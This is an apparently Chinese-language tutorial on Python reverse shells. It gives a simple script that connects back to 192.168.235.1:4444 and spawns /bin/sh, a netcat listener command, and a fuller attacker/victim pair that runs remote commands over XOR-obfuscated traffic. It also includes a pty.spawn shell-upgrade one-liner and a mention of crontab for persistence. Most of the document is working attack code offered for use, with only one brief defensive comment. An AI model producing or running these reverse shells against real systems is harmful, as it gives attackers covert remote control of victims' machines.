python反弹shell
/etc/crontab设置定期执行的任务,修改需要root权限
简易版
python反弹shell的文件:
1 #!/usr/bin/python 2 import os,subprocess,socket 3 4 s=socket.socket(socket.AF_INET,socket,SOCK_STREAM) 5 s.connect((192.168.235.1,4444)) 6 os.dup2(s.fileno(),0) 7 os.dup2(s.fileno(),1) 8 os.dup2(s.fileno(),2) 9 p=subprocess.call(["/bin/sh","-i"])
攻击机使用监听命令: nc -vlp 4444
完整版
攻击机(监听端口4444得到shell)执行的文件:
1 #!/usr/bin/env python3 2 # -*- coding:utf-8 -*- 3 # Author:Ameng, jlx-love.com 4 5 from socket import * 6 import struct 7 8 9 client = socket(AF_INET,SOCK_STREAM) 10 client.bind(('0.0.0.0',4444)) 11 client.listen(5) 12 print('[+]Listening on port 4444...') 13 (conn,(ip,port)) = client.accept() 14 print('connect successfully to',ip) 15 16 def encrypt(data): 17 data = bytearray(data) 18 for i in range(len(data)): 19 data[i] ^= 0x23 20 return data 21 22 23 def decrypt(data): 24 data = bytearray(data) 25 for i in range(len(data)): 26 data[i] ^= 0x23 27 return data 28 29 30 while True: 31 cmd = input('~$ ').strip() 32 if len(cmd) == 0: 33 continue 34 cmd = encrypt(cmd.encode('utf-8')) 35 conn.send(cmd) 36 header = conn.recv(4) 37 total_size = struct.unpack('i',header)[0] 38 recv_size = 0 39 while recv_size < total_size: 40 recv_data = conn.recv(1024) 41 recv_size += len(recv_data) 42 recv_data = decrypt(recv_data) 43 print(recv_data.decode('utf-8'),end='')
靶机(被拿到shell)执行的文件:
1 #!/usr/bin/env python3 2 # -*- coding:utf-8 -*- 3 # Author:Ameng, jlx-love.com 4 5 from socket import * 6 import subprocess 7 import struct 8 9 10 11 server = socket(AF_INET,SOCK_STREAM) 12 server.connect(('192.168.235.1',4444)) 13 14 def encrypt(data): 15 data = bytearray(data) 16 for i in range(len(data)): 17 data[i] ^= 0x23 18 return data 19 20 21 def decrypt(data): 22 data = bytearray(data) 23 for i in range(len(data)): 24 data[i] ^= 0x23 25 return data 26 27 28 while True: 29 try: 30 cmd = server.recv(1024) 31 cmd = decrypt(cmd) 32 if len(cmd) == 0: 33 break 34 res = subprocess.Popen(cmd.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE) 35 stdout_res = res.stdout.read() 36 stderr_res = res.stderr.read() 37 result = stdout_res + stderr_res 38 result = encrypt(result) 39 total_size = len(result) 40 header = struct.pack('i',total_size) 41 server.send(header) 42 server.send(result) 43 except Exception: 44 break 45 server.close()
注:在靶机运行py文件时才能在攻击机执行命令,当停止运行则shell环境结束
得到shell的命令行优化指令:
# Starts /bin/bash under a pseudo-terminal through Python's pty module, so the
# session behaves like a real terminal for programs that require one.
# Defender's view: a "python -c" command line containing pty.spawn that launches
# a shell is a well-known post-compromise indicator in process-creation logs.
python -c "import pty;pty.spawn('/bin/bash')"